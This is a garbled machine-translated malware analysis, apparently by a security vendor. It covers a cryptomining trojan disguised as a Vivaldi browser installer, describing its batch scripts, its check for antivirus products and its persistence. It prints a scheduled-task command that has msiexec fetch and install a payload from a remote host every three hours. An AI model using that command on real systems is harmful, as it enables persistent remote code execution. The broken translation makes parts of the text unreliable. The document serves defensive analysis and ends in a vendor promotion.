When alternately month, the WinstarNssmMiner position that before 360 safe centers are monitored again, force digs mine is active, intercept quantity of nearly two days already exceeded 200 thousand, safe researcher calls this vaulting horse WinstarNssmMiner2. The characteristic that digs mine trojan this is the installation bag that can pretend all sorts of commonly used software such as Vivaldi browser, download with this diddle user, because this kind commits the crime trick is very difficult by user get behind, user of safe researcher proposal goes as far as possible when having download software demand government-owned net, or 360 software chamberlain downloads, in order to assure the safety of computer.
Trojan analysis
It is with Vivaldi browser exemple, the trojan virus that camouflage includes into this browser installation used MSI to install packet of software that make, and the download document that virus fabricant can use this software executes a function, bypass when download digs mine trojan to arrive on computer the intercept of the software that reduce toxin. The meeting after solution presses the Vivaldi browser of camouflage to install a bag sees its included file of many batch processing, add secret Zip format file, reconcile the tool Unzip that controls Zip file.
Graph one: Install the file inside the bag
After the trojan is started, can run the U.bat file in installing a bag to call Unzip file solution to compress a bag above all, solution presses a password to be X12, see extrude Nircmd program.
Graph 2: Call Unzip file solution to press
Carry out C.bat then, the action of this program is to judged user computer to whether install Kaspersky, ESET and DrWeb to kill poisonous software, if detect,go out to already was installed, can end installation to wrap Msiexec.exe process to delete trojan file so, virus commits suicide.
Graph 3: If computer installs Kaspersky, ESET, DrWeb criterion virus commits suicide
If carry out did not discover above kills poisonous software 3 kinds after C.bat, can carry out Nir.bat to call Nircmd program to start I.bat then
Graph 4: Executive Nir.bat calls Nircmd
This program can solve administrator attributive to start an issue, through starting I.bat to add a plan the task is started, file of Msiexec.exe of trojan copy system arrives accompanying documents name, next the domain name Makerstat.info random as executable as program (.exe) suffixal joining together generates URL, composition plans task content, the file download that uses installation to wrap oneself of MSI of the software that make next carries out a function to bypass the intercept of the software that reduce toxin.
Graph 5: Generate plan task content
This the executive command of analytic trojan equipment is:
Schtasks /create /tn "TEST-xxx" /tr "'C:WINDOWSSystem323164326753.exe' /i Http://makerstat.info/26753.rar /q" /sc Minute /mo 180 /rl Highest /f
Among them 3164326753.exe is Msiexec.exe file actually. Following plan institute show the plan content that found:
Graph 6: The plan task content that already generated
URL address cannot be visited at present, the main effect of the trojan founds to be started invalidly it seems that temporarily namely, make the medium of communication that can allot new trojan at any time, once trojan author installs the URL on the line the trojan, 3 hours can go to machine every other request trojan is carried out. And this MSI trojan is the WinstarNssmMiner that analyses before us digs mine trojan actually. Follow-up process can consult preamble:
Http://sh.qihoo.com/pc/detail? Url=http%3A%2F%2Fzm.news.so.com%2F5d72f37ae3d204686153caa932fbb06e&check=a5a83191f0df8646&sign=llq&uid=test_zm
After executing a series of operations to dig mine, this installs the meeting that hire talent to install Vivaldi browser on user computer.
Dig mine trojan to this kind, the safe software with the not much number that includes 360 safety to steward inside only at present is OK check goes out
Graph 7: But the software reducing toxin that check gives WinstarNssmMiner2 to dig mine trojan
Safety reminds
Near future home digs mine trojan very active, let people's air defense be prevented deeply. Proposal user hits a patch in time for system and tripartite software, discover computer gets stuck to wait for unusual situation moment slow to use safe software to scan, the constant open that notices to assure safe software at the same time in order to have defence, once suffer revulsive and inadvertent in action, can use 360 safe bodyguard to check as soon as possible kill cleared vaulting horse.
In addition, 360 safe bodyguard had rolled out the trojan that dig mine to defend function, comprehensive defense digs mine trojan from what all sorts of channel inbreak. User open after this function, 360 safe bodyguard will real time intercept is of all kinds the attack of the trojan that dig mine, escort the Emperor for user computer security convoy.
For computer equipment defends the garment can be clicked >>>Http://urlqh.cn/m5rYE
